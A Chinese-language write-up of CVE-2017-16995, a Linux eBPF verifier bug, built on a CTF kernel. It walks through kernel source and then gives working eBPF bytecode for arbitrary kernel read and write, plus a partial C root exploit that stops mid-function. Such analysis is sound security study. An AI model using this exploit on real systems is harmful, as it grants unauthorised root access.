HBh25Y
HBh25Y

CVE-2017-16995漏洞分析

CVE-2017-16995特定内核提权漏洞分析

前言

这个漏洞于2017年12月21号Google Project Zero团队的Jann Horn发现并报告的,编号为CVE-2017-16995,然而在2018年4月再次被国外安全研究者Vitaly Nikolenko发现,并可以对特定内核版本的Ubuntu 16.04进行提权。

这个漏洞没有使用传统的漏洞利用方式,没有使用堆栈。看了P4nda师傅的文章,里面说是使用一种叫Data-Oriented Attacks的攻击方式。

本文是基于v4.4.110内核,其实是因为有现成的ctf题目,封装好的内核,哈哈哈哈。

在此感谢P4nda师傅和rebeyond师傅,如果文章有什么错误,看到的师傅们记得提醒一下菜鸡。

漏洞简介和前置知识

该漏洞仍然是基于ebpf模块的漏洞,其主要成因是在对输入的ebpf指令判断时和真实执行时,没有考虑到位扩展的问题,导致在校验和真实执行是代码不一致。
ebpf模块:前身是bpf模块,本身是用于包过滤的一个过滤器,包涵自己特有的一种指令集EBPF,主要可以为用户加载数据包过滤代码进入内核,并在收到数据包时触发这段代码。但是ebpf模块又不仅仅只是用来作为过滤器。内核的bpf支持是一种基础架构。仅仅是一种中间代码的表达方式。是作为向用户空间提供一个向内核注入可运行代码的公共接口。这些注入的代码可以通过事件(如往socket写数据)来触发。这里用的就是向socket写数据。
bpf程序的加载的流程
1.用户程序调用syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))申请创建一个map,在attr结构体中指定map的类型、大小、最大容量等属性。map类似是内核和用户交互的一块空间。
2.用户程序调用syscall(__NR_bpf, BPF_PROG_LOAD,&attr, sizeof(attr))来将我们写的BPF代码加载进内核,在加载之前会利用虚拟执行的方式来做安全性校验。安全校验通过后,程序被成功加载至内核,后续真正执行时,不再重复做检查。
3.用户程序调用setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)来将我们的bpf程序绑定在一个socket上。

其他函数:利用int socketpair(int d, int type, int protocol, int sv[2])可以创建一个socket(套接字),分别连接两个进程。在map建立完成之后,用户程序可以通过syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr))查看map中数据,也可以通过syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr))对map数据进行更新。
ebpf指令集
基本的指令格式:

struct bpf_insn {
	__u8	code;		/* 操作码 */
	__u8	dst_reg:4;	/* 目标寄存器 */
	__u8	src_reg:4;	/* 源寄存器 */
	__s16	off;		/* 偏移地址 */
	__s32	imm;		/* 立即值 */
};

寄存器:

R0:一般用来表示函数返回值,包括整个 BPF 代码块(其实也可被看做一个函数)的返回值;
R1~R5:一般用于表示内核预设函数的参数;
R6~R9:在 BPF 代码中可以作存储用,其值不受内核预设函数影响;
R10:只读,用作栈顶指针(SP)
在x86-64下,寄存器的映射方法如下:
   R0 - rax
   R1 - rdi
   R2 - rsi
   R3 - rdx
   R4 - rcx
   R5 - r8
   R6 - rbx
   R7 - r13
   R8 - r14
   R9 - r15
   R10 – rbp

基本的操作码(code):
特别注意BPF_LD\LDX和BPF_ST\STX这两个指令
BPF_LD\LDX:把源寄存器的值作为地址取值放到目标寄存器
类似mov dword ptr[r7],r8
BPF_ST\STX:把源寄存器的值放到目标寄存器的值指向的位置
类似mov r8,dword ptr[r7]
详细信息可以查源码
ebpf代码执行时会调用这里

#define BPF_CLASS(code) ((code) & 0x07)
#define		BPF_LD		0x00               
#define		BPF_LDX		0x01
#define		BPF_ST		0x02               
#define		BPF_STX		0x03
#define		BPF_ALU		0x04
#define		BPF_JMP		0x05
#define		BPF_RET		0x06
#define		BPF_MISC        0x07

例子

二进制代码:
\xb4\x09\x00\x00\xff\xff\xff\xff
翻译后:
ALU_MOV_K(9,0,0x0,0xffffffff)
解释:
[BPF_ALU | BPF_MOV | BPF_K] = &&ALU_MOV_K
查看源代码:
0xb4 = BPF_ALU | BPF_MOV = 0x04 | 0xb0
0x09 = r9寄存器
0xffffffff = 立即数值
含义就是:
mov r9,0xffffffff

漏洞分析

加载和检验过程

首先放两个主要设计到的结构体(我们使用的是BPF_PROG_LOAD):

union bpf_attr {
	struct { /* anonymous struct used by BPF_MAP_CREATE command */
		__u32	map_type;	/* one of enum bpf_map_type */
		__u32	key_size;	/* size of key in bytes */
		__u32	value_size;	/* size of value in bytes */
		__u32	max_entries;	/* max number of entries in a map */
	};

	struct { /* anonymous struct used by BPF_MAP_*_ELEM commands */
		__u32		map_fd;
		__aligned_u64	key;
		union {
			__aligned_u64 value;
			__aligned_u64 next_key;
		};
		__u64		flags;
	};

	struct { /* anonymous struct used by BPF_PROG_LOAD command */
		__u32		prog_type;	/* one of enum bpf_prog_type */
		__u32		insn_cnt;
		__aligned_u64	insns;
		__aligned_u64	license;
		__u32		log_level;	/* verbosity level of verifier */
		__u32		log_size;	/* size of user buffer */
		__aligned_u64	log_buf;	/* user supplied buffer */
		__u32		kern_version;	/* checked when prog_type=kprobe */
	};

	struct { /* anonymous struct used by BPF_OBJ_* commands */
		__aligned_u64	pathname;
		__u32		bpf_fd;
	};
} __attribute__((aligned(8)));

struct bpf_prog {
	u16			pages;		/* Number of allocated pages */
	kmemcheck_bitfield_begin(meta);
	u16			jited:1,	/* Is our filter JIT'ed? */
				gpl_compatible:1, /* Is filter GPL compatible? */
				cb_access:1,	/* Is control block accessed? */
				dst_needed:1;	/* Do we need dst entry? */
	kmemcheck_bitfield_end(meta);
	u32			len;		/* 写入指令的数量 */
	enum bpf_prog_type	type;		/* Type of BPF program */
	struct bpf_prog_aux	*aux;		/* Auxiliary fields */
	struct sock_fprog_kern	*orig_prog;	/* Original BPF program */
	unsigned int		(*bpf_func)(const struct sk_buff *skb,
					    const struct bpf_insn *filter);
	/* 存储着我们写入的指令 */
	union {
		struct sock_filter	insns[0];
		struct bpf_insn		insnsi[0];
	};
};

我们这次漏洞发生的主要位置是在程序加载的校验和真实执行时的不同,所以进入bpf_prog_load函数看一下
[1]:验证GPL证书
[2]:在内核中为ebpf程序开辟内存空间
[3]:把ebpf程序拷贝到内核空间
[4]:检查ebpf程序,也是我们的漏洞点所在处

static int bpf_prog_load(union bpf_attr *attr)
{
	enum bpf_prog_type type = attr->prog_type;
	struct bpf_prog *prog;
	int err;
	char license[128];
	bool is_gpl;

	if (CHECK_ATTR(BPF_PROG_LOAD))
		return -EINVAL;

	/* copy eBPF program license from user space */
	if (strncpy_from_user(license, u64_to_ptr(attr->license),
			      sizeof(license) - 1) < 0)
		return -EFAULT;
	license[sizeof(license) - 1] = 0;

	/* eBPF programs must be GPL compatible to use GPL-ed functions */
	is_gpl = license_is_gpl_compatible(license);                     //[1]

	if (attr->insn_cnt >= BPF_MAXINSNS)
		return -EINVAL;

	if (type == BPF_PROG_TYPE_KPROBE &&
	    attr->kern_version != LINUX_VERSION_CODE)
		return -EINVAL;

	if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
		return -EPERM;

	/* plain bpf_prog allocation */
	prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);    //[2]
	if (!prog)
		return -ENOMEM;

	err = bpf_prog_charge_memlock(prog);
	if (err)
		goto free_prog_nouncharge;

	prog->len = attr->insn_cnt;

	err = -EFAULT;
	if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),        //[3]
			   prog->len * sizeof(struct bpf_insn)) != 0)
		goto free_prog;

	prog->orig_prog = NULL;
	prog->jited = 0;

	atomic_set(&prog->aux->refcnt, 1);
	prog->gpl_compatible = is_gpl ? 1 : 0;

	/* find program type: socket_filter vs tracing_filter */
	err = find_prog_type(type, prog);
	if (err < 0)
		goto free_prog;

	/* run eBPF verifier */
	err = bpf_check(&prog, attr);                                   //[4]
	if (err < 0)
		goto free_used_maps;

	/* fixup BPF_CALL->imm field */
	fixup_bpf_calls(prog);

	/* eBPF program is ready to be JITed */
	err = bpf_prog_select_runtime(prog);
	if (err < 0)
		goto free_used_maps;

	err = bpf_prog_new_fd(prog);
	if (err < 0)
		/* failed to allocate fd */
		goto free_used_maps;

	return err;

free_used_maps:
	free_used_maps(prog->aux);
free_prog:
	bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
	bpf_prog_free(prog);
	return err;
}

我们进入关键的函数bpf_check
[1]:根据env,找到真实的map地址
[2]:借用了程序控制流图的思路来检查这个EBPF程序中是否有死循环和跳转到未初始化的位置,造成无法预期的风险
[3]:模仿真实执行的步骤,来进行校验
结构体:

struct verifier_env {
	struct bpf_prog *prog;		/* eBPF program being verified */
	struct verifier_stack_elem *head; /* stack of verifier states to be processed */
	int stack_size;			/* number of states to be processed */
	struct verifier_state cur_state; /* current verifier state */
	struct verifier_state_list **explored_states; /* search pruning optimization */
	struct bpf_map *used_maps[MAX_USED_MAPS]; /* array of map's used by eBPF program */
	u32 used_map_cnt;		/* number of used maps */
	bool allow_ptr_leaks;
};

函数:

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
	char __user *log_ubuf = NULL;
	struct verifier_env *env;
	int ret = -EINVAL;

	if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
		return -E2BIG;

	/* 'struct verifier_env' can be global, but since it's not small,
	 * allocate/free it every time bpf_check() is called
	 */
	env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
	if (!env)
		return -ENOMEM;

	env->prog = *prog;

	/* grab the mutex to protect few globals used by verifier */
	mutex_lock(&bpf_verifier_lock);

	if (attr->log_level || attr->log_buf || attr->log_size) {
		/* user requested verbose verifier output
		 * and supplied buffer to store the verification trace
		 */
		log_level = attr->log_level;
		log_ubuf = (char __user *) (unsigned long) attr->log_buf;
		log_size = attr->log_size;
		log_len = 0;

		ret = -EINVAL;
		/* log_* values have to be sane */
		if (log_size < 128 || log_size > UINT_MAX >> 8 ||
		    log_level == 0 || log_ubuf == NULL)
			goto free_env;

		ret = -ENOMEM;
		log_buf = vmalloc(log_size);
		if (!log_buf)
			goto free_env;
	} else {
		log_level = 0;
	}

	ret = replace_map_fd_with_map_ptr(env);                   //[1]
	if (ret < 0)
		goto skip_full_check;

	env->explored_states = kcalloc(env->prog->len,
				       sizeof(struct verifier_state_list *),
				       GFP_USER);
	ret = -ENOMEM;
	if (!env->explored_states)
		goto skip_full_check;

	ret = check_cfg(env);                                   //[2]
	if (ret < 0)
		goto skip_full_check;

	env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

	ret = do_check(env);                                    //[3]

skip_full_check:
	while (pop_stack(env, NULL) >= 0);
	free_states(env);

	if (ret == 0)
		/* program is valid, convert *(u32*)(ctx + off) accesses */
		ret = convert_ctx_accesses(env);

	if (log_level && log_len >= log_size - 1) {
		BUG_ON(log_len >= log_size);
		/* verifier log exceeded user supplied buffer */
		ret = -ENOSPC;
		/* fall through to return what was recorded */
	}

	/* copy verifier log back to user space including trailing zero */
	if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
		ret = -EFAULT;
		goto free_log_buf;
	}

	if (ret == 0 && env->used_map_cnt) {
		/* if program passed verifier, update used_maps in bpf_prog_info */
		env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
							  sizeof(env->used_maps[0]),
							  GFP_KERNEL);

		if (!env->prog->aux->used_maps) {
			ret = -ENOMEM;
			goto free_log_buf;
		}

		memcpy(env->prog->aux->used_maps, env->used_maps,
		       sizeof(env->used_maps[0]) * env->used_map_cnt);
		env->prog->aux->used_map_cnt = env->used_map_cnt;

		/* program is valid. Convert pseudo bpf_ld_imm64 into generic
		 * bpf_ld_imm64 instructions
		 */
		convert_pseudo_ld_imm64(env);
	}

free_log_buf:
	if (log_level)
		vfree(log_buf);
free_env:
	if (!env->prog->aux->used_maps)
		/* if we didn't copy map pointers into bpf_prog_info, release
		 * them now. Otherwise free_bpf_prog_info() will release them.
		 */
		release_maps(env);
	*prog = env->prog;
	kfree(env);
	mutex_unlock(&bpf_verifier_lock);
	return ret;
}

接下来进入我们的校验函数,也是最关键的漏洞存在函数do_check由于这个函数有点长,我们拆解开来分析
这部分是准备部分:
[1]:这里可以看到整个代码处于无限循环中

static int do_check(struct verifier_env *env)
{
	struct verifier_state *state = &env->cur_state;
	struct bpf_insn *insns = env->prog->insnsi;
	struct reg_state *regs = state->regs;
	int insn_cnt = env->prog->len;
	int insn_idx, prev_insn_idx = 0;
	int insn_processed = 0;
	bool do_print_state = false;

	init_reg_state(regs);
	insn_idx = 0;
	for (;;) {                                  //[1]
		struct bpf_insn *insn;
		u8 class;
		int err;

		if (insn_idx >= insn_cnt) {
			verbose("invalid insn idx %d insn_cnt %d\n",
				insn_idx, insn_cnt);
			return -EFAULT;
		}

		insn = &insns[insn_idx];
		class = BPF_CLASS(insn->code);

		if (++insn_processed > 32768) {
			verbose("BPF program is too large. Proccessed %d insn\n",
				insn_processed);
			return -E2BIG;
		}

		err = is_state_visited(env, insn_idx);
		if (err < 0)
			return err;
		if (err == 1) {
			/* found equivalent state, can prune the search */
			if (log_level) {
				if (do_print_state)
					verbose("\nfrom %d to %d: safe\n",
						prev_insn_idx, insn_idx);
				else
					verbose("%d: safe\n", insn_idx);
			}
			goto process_bpf_exit;
		}

		if (log_level && do_print_state) {
			verbose("\nfrom %d to %d:", prev_insn_idx, insn_idx);
			print_verifier_state(env);
			do_print_state = false;
		}

		if (log_level) {
			verbose("%d: ", insn_idx);
			print_bpf_insn(env, insn);
		}

然后是根据我们写入的代码,依次从二进制层面上拆解,我上面在前置知识中举过例子,一句bpf指令的操作码在执行的时候分为三个部分,详细见这里和do_check()源代码所以这里就先从第一部分开始
首先是ALU部分

		if (class == BPF_ALU || class == BPF_ALU64) {
			err = check_alu_op(env, insn);
			if (err)
				return err;

		}

其次是LDX部分

else if (class == BPF_LDX) {
			enum bpf_reg_type src_reg_type;

			/* check for reserved fields is already done */

			/* check src operand */
			err = check_reg_arg(regs, insn->src_reg, SRC_OP);
			if (err)
				return err;

			err = check_reg_arg(regs, insn->dst_reg, DST_OP_NO_MARK);
			if (err)
				return err;

			src_reg_type = regs[insn->src_reg].type;

			/* check that memory (src_reg + off) is readable,
			 * the state of dst_reg will be updated by this func
			 */
			err = check_mem_access(env, insn->src_reg, insn->off,
					       BPF_SIZE(insn->code), BPF_READ,
					       insn->dst_reg);
			if (err)
				return err;

			if (BPF_SIZE(insn->code) != BPF_W) {
				insn_idx++;
				continue;
			}

			if (insn->imm == 0) {
				/* saw a valid insn
				 * dst_reg = *(u32 *)(src_reg + off)
				 * use reserved 'imm' field to mark this insn
				 */
				insn->imm = src_reg_type;

			} else if (src_reg_type != insn->imm &&
				   (src_reg_type == PTR_TO_CTX ||
				    insn->imm == PTR_TO_CTX)) {
				/* ABuser program is trying to use the same insn
				 * dst_reg = *(u32*) (src_reg + off)
				 * with different pointer types:
				 * src_reg == ctx in one branch and
				 * src_reg == stack|map in some other branch.
				 * Reject it.
				 */
				verbose("same insn cannot be used with different pointers\n");
				return -EINVAL;
			}

		}

后面还有一些,我们就不一一列举了,想看的可以直接看源代码,我们来看漏洞点的地方,即BPF_JMP部分,我们可以看到,如果要退出整个循环,要么代码出错,要么在pop_stack()函数时,发现整个程序已经执行完了,如果遇到特定的选择语句(第二个是参数是BPF_JNE这种),就会进入check_cond_jmp_op来进行判断。

 else if (class == BPF_JMP) {
			u8 opcode = BPF_OP(insn->code);

			if (opcode == BPF_CALL) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->off != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0) {
					verbose("BPF_CALL uses reserved fields\n");
					return -EINVAL;
				}

				err = check_call(env, insn->imm);
				if (err)
					return err;

			} else if (opcode == BPF_JA) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->imm != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0) {
					verbose("BPF_JA uses reserved fields\n");
					return -EINVAL;
				}

				insn_idx += insn->off + 1;
				continue;

			} else if (opcode == BPF_EXIT) {
				if (BPF_SRC(insn->code) != BPF_K ||
				    insn->imm != 0 ||
				    insn->src_reg != BPF_REG_0 ||
				    insn->dst_reg != BPF_REG_0) {
					verbose("BPF_EXIT uses reserved fields\n");
					return -EINVAL;
				}

				/* eBPF calling convetion is such that R0 is used
				 * to return the value from eBPF program.
				 * Make sure that it's readable at this time
				 * of bpf_exit, which means that program wrote
				 * something into it earlier
				 */
				err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
				if (err)
					return err;

				if (is_pointer_value(env, BPF_REG_0)) {
					verbose("R0 leaks addr as return value\n");
					return -EACCES;
				}

process_bpf_exit:
				insn_idx = pop_stack(env, &prev_insn_idx);
				if (insn_idx < 0) {
					break;
				} else {
					do_print_state = true;
					continue;
				}
			} else {
				err = check_cond_jmp_op(env, insn, &insn_idx);
				if (err)
					return err;
			}
		}

我们进入check_cond_jmp_op函数看一看,代码很长,但是主要功能就是在一个条件成立时,这里判断是否相等时(这儿判断时都是u32位的),直接将其下一句push进栈中,不检查条件失败时的语句。

static int check_cond_jmp_op(struct verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct reg_state *regs = env->cur_state.regs;
	struct verifier_state *other_branch;
	u8 opcode = BPF_OP(insn->code);
	int err;

	if (opcode > BPF_EXIT) {
		verbose("invalid BPF_JMP opcode %x\n", opcode);
		return -EINVAL;
	}

	if (BPF_SRC(insn->code) == BPF_X) {
		if (insn->imm != 0) {
			verbose("BPF_JMP uses reserved fields\n");
			return -EINVAL;
		}

		/* check src1 operand */
		err = check_reg_arg(regs, insn->src_reg, SRC_OP);
		if (err)
			return err;

		if (is_pointer_value(env, insn->src_reg)) {
			verbose("R%d pointer comparison prohibited\n",
				insn->src_reg);
			return -EACCES;
		}
	} else {
		if (insn->src_reg != BPF_REG_0) {
			verbose("BPF_JMP uses reserved fields\n");
			return -EINVAL;
		}
	}

	/* check src2 operand */
	err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
	if (err)
		return err;

	/* detect if R == 0 where R was initialized to zero earlier */
	if (BPF_SRC(insn->code) == BPF_K &&
	    (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    regs[insn->dst_reg].type == CONST_IMM &&
	    regs[insn->dst_reg].imm == insn->imm) {
		if (opcode == BPF_JEQ) {
			/* if (imm == imm) goto pc+off;
			 * only follow the goto, ignore fall-through
			 */
			*insn_idx += insn->off;
			return 0;
		} else {
			/* if (imm != imm) goto pc+off;
			 * only follow fall-through branch, since
			 * that's where the program will go
			 */
			return 0;
		}
	}

	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
	if (!other_branch)
		return -EFAULT;

	/* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
	if (BPF_SRC(insn->code) == BPF_K &&
	    insn->imm == 0 && (opcode == BPF_JEQ ||
			       opcode == BPF_JNE) &&
	    regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
		if (opcode == BPF_JEQ) {
			/* next fallthrough insn can access memory via
			 * this register
			 */
			regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
			/* branch targer cannot access it, since reg == 0 */
			other_branch->regs[insn->dst_reg].type = CONST_IMM;
			other_branch->regs[insn->dst_reg].imm = 0;
		} else {
			other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
			regs[insn->dst_reg].type = CONST_IMM;
			regs[insn->dst_reg].imm = 0;
		}
	} else if (is_pointer_value(env, insn->dst_reg)) {
		verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
		return -EACCES;
	} else if (BPF_SRC(insn->code) == BPF_K &&
		   (opcode == BPF_JEQ || opcode == BPF_JNE)) {

		if (opcode == BPF_JEQ) {
			/* detect if (R == imm) goto
			 * and in the target state recognize that R = imm
			 */
			other_branch->regs[insn->dst_reg].type = CONST_IMM;
			other_branch->regs[insn->dst_reg].imm = insn->imm;
		} else {
			/* detect if (R != imm) goto
			 * and in the fall-through state recognize that R = imm
			 */
			regs[insn->dst_reg].type = CONST_IMM;
			regs[insn->dst_reg].imm = insn->imm;
		}
	}
	if (log_level)
		print_verifier_state(env);
	return 0;
}

执行过程

进入__bpf_prog_run函数,发现
执行JMP_JNE_K等判断语句的时候,用的DST是u64(是被源代码中的tmp参数赋值的),但是IMM确是s32,所以在真实执行,会与加载时不同。漏洞出现

#define DST	regs[insn->dst_reg]
u64 regs[MAX_BPF_REG], tmp;
	JMP_JNE_K:
		if (DST != IMM) {
			insn += insn->off;
			CONT_JMP;
		}
		CONT;

漏洞利用

核心代码分析
漏洞利用的核心代码这儿,主要是通过前4句代码,通过检测,然后在真实执行时,执行后续代码.
使用map[0]作为操作号,map[1]和map[2]作为操作数,map是可读可写的。
功能一:map[0]=0时,将map[1]中地址所指的内容放入map[2]
功能二:map[0]=1时,将栈地址rbp的值写入map[2]
功能三:map[0]=2时,map[2]的值写入map[1]地址所指的内容中

		"\xb4\x09\x00\x00\xff\xff\xff\xff"                             //mov r9,0xffffffff
		"\x55\x09\x02\x00\xff\xff\xff\xff"                             //if r9=0xffffffff jmp [0]
		"\xb7\x00\x00\x00\x00\x00\x00\x00"                             
		"\x95\x00\x00\x00\x00\x00\x00\x00"                             //exit()通过ebpf的检验,只要执行前4行,即成功通过
		"\x18\x19\x00\x00\x03\x00\x00\x00"                             //r9=mapfd
		"\x00\x00\x00\x00\x00\x00\x00\x00"                             //padding
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                             //r1=r9,[1]接下来8行主要功能是r6=map[0]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"                             //r2=rbp                             
		"\x07\x02\x00\x00\xfc\xff\xff\xff"                             //r2 = r2-4
		"\x62\x0a\xfc\xff\x00\x00\x00\x00"                             //[rbp+(-4)] = 0
		"\x85\x00\x00\x00\x01\x00\x00\x00"                             //call BPF_FUNC_map_lookup_elem
		"\x55\x00\x01\x00\x00\x00\x00\x00"                             //if r0== 0:
		"\x95\x00\x00\x00\x00\x00\x00\x00"                             //exit(0)
		"\x79\x06\x00\x00\x00\x00\x00\x00"                             //r6=map[0]
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                             //[2],接下来8行主要功能是r7=map[1]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x01\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x07\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                               //[3],接下来8行主要功能是r8=map[2]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x02\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x08\x00\x00\x00\x00\x00\x00"
		"\xbf\x02\x00\x00\x00\x00\x00\x00"                               //r2=r0     从这里往下根据map[0](即r6)的值来执行代码
		"\xb7\x00\x00\x00\x00\x00\x00\x00"                               //r0=0
		"\x55\x06\x03\x00\x00\x00\x00\x00"                               //if r6!=0 jmpto if r6!=1
		"\x79\x73\x00\x00\x00\x00\x00\x00"                               //r3 = [r7]    指令一,任意读
		"\x7b\x32\x00\x00\x00\x00\x00\x00"                               //[r2]=r3
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x55\x06\x02\x00\x01\x00\x00\x00"                               //if r6!=1 jmpto [r7]=r8
		"\x7b\xa2\x00\x00\x00\x00\x00\x00"                               //[r2]=rbp     指令二,泄露栈地址
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x7b\x87\x00\x00\x00\x00\x00\x00"                               //[r7]=r8      指令三,任意写
		"\x95\x00\x00\x00\x00\x00\x00\x00";                              //exit(0)

基本分析就是像前置知识中的例子一样一一分析。
利用思路
1.用上述代码的功能二,读取出内核栈的地址
2.通过偏移,计算出task_struct的地址,加上cred的偏移地址,并用功能一读取出cred的地址
3.cred地址加上uid的偏移,用功能一读出uid的地址
3.用功能三修改uid的值为0,成功提权

exp

这个exp是P4nda师傅的,我自己写的很乱。。。我加了些注解,方便理解,还有,注意不同系统偏移需要重新计算。

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
//偏移需要自己去计算
#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x9b8 //0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328 //-32

int sockets[2];
int mapfd, progfd;

//核心代码
char *__prog = 	"\xb4\x09\x00\x00\xff\xff\xff\xff"
		"\x55\x09\x02\x00\xff\xff\xff\xff"
		"\xb7\x00\x00\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"                             //通过ebpf的检验,只要执行前4行,即成功通过
		"\x18\x19\x00\x00\x03\x00\x00\x00"
		"\x00\x00\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                             //1,r6=map[0]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x00\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x06\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                              //2,r7=map[1]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x01\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x07\x00\x00\x00\x00\x00\x00"
		"\xbf\x91\x00\x00\x00\x00\x00\x00"                               //3,r8=map[2]
		"\xbf\xa2\x00\x00\x00\x00\x00\x00"
		"\x07\x02\x00\x00\xfc\xff\xff\xff"
		"\x62\x0a\xfc\xff\x02\x00\x00\x00"
		"\x85\x00\x00\x00\x01\x00\x00\x00"
		"\x55\x00\x01\x00\x00\x00\x00\x00"
		"\x95\x00\x00\x00\x00\x00\x00\x00"
		"\x79\x08\x00\x00\x00\x00\x00\x00"
		"\xbf\x02\x00\x00\x00\x00\x00\x00"                               //r2=r0     从这里往下根据map[0](即r6)的值来执行代码
		"\xb7\x00\x00\x00\x00\x00\x00\x00"                               //r0=0
		"\x55\x06\x03\x00\x00\x00\x00\x00"                               //if r6!=0 jmpto if r6!=1
		"\x79\x73\x00\x00\x00\x00\x00\x00"                               //r3 = [r7]    指令一,任意读
		"\x7b\x32\x00\x00\x00\x00\x00\x00"                               //[r2]=r3
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x55\x06\x02\x00\x01\x00\x00\x00"                               //if r6!=1 jmpto [r7]=r8
		"\x7b\xa2\x00\x00\x00\x00\x00\x00"                               //[r2]=rbp     指令二,泄露栈地址
		"\x95\x00\x00\x00\x00\x00\x00\x00"                               //exit(0)
		"\x7b\x87\x00\x00\x00\x00\x00\x00"                               //[r7]=r8      指令三,任意写
		"\x95\x00\x00\x00\x00\x00\x00\x00";                              //exit(0)           

char bpf_log_buf[LOG_BUF_SIZE];
//封装一些bpf的操作,还有一些必要的结构体
static int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version) {
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = (__u64)insns,
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = (__u64)license,
		.log_buf = (__u64)bpf_log_buf,
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries) {
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)&value,
		.flags = 0,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
	fprintf(stderr, "error: %s\n", err);
	exit(-1);
}

//准备函数
static void prep(void) {
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);             //创建公共缓冲区map
	if (mapfd < 0)
		__exit(strerror(errno));
	puts("mapfd finished");
	progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,                                        //加载注入的代码进内核
			(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

	if (progfd < 0)
		__exit(strerror(errno));
	puts("bpf_prog_load finished");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))                                            //准备一个sockets作为套接口组,来进行通信
